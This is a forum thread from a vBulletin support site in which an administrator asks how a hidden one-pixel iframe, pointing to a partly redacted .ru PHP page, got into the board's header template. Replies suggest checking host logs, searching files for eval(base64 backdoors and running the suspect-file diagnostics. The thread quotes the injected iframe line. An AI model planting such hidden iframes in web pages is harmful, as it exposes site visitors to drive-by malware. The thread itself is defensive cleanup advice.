PDA

View Full Version : help with unauthorized entries on my forum - badware


GTX2
11-01-2011, 11:00 PM
Need some help from you guyz....
Today when browsing my forum website i got a warning from google telling i had some badware code somewhere. After checking google webmaster tools, they said i had this code somewhere on my website:

<iframe width=1 height=1 frameborder=0 src=http://www.**-***.ru/vb/legacy/phra.php></iframe> (removed some letters due security reasons)

After making a search on my templates, saw this code was entered in my header template !!!
Removed immediately but now would like to investigate how someone could have gain access to my templates and my board as i am the only admin accessing the boards. AdminCP logs says no access from third parties. Where can i check other unauthorized entries?


If posting in wrong section, please forward
Thank you !

ForceHSS
11-02-2011, 01:20 AM
check logs with host

Simon Lloyd
11-02-2011, 02:38 AM
Sounds like you have a php fie that could have added some Eval(base64 code, you will need to search all your files for eval(base64 or even just base64 to be able to remove the lines or just overwrite the core vbulletin files (if you haven't modified them) with new ones via ftp in ASCii mode, but unless you find the php file (not one of vbulletins) thats causing it it's going to come back!

You can check vbulletins files using the diagnostics in admincp>maintainance>diagnostics>suspect file versions run this and if vbulletin finds code that doesn't belong there it will flag the file up to you, but remember it will not show you which 3rd party php file is causing the issue.

Also check here https://www.vbulletin.com/forum/showthread.php/194701-How-To-Make-My-Forums-More-Secure for tips in preventing it in the future.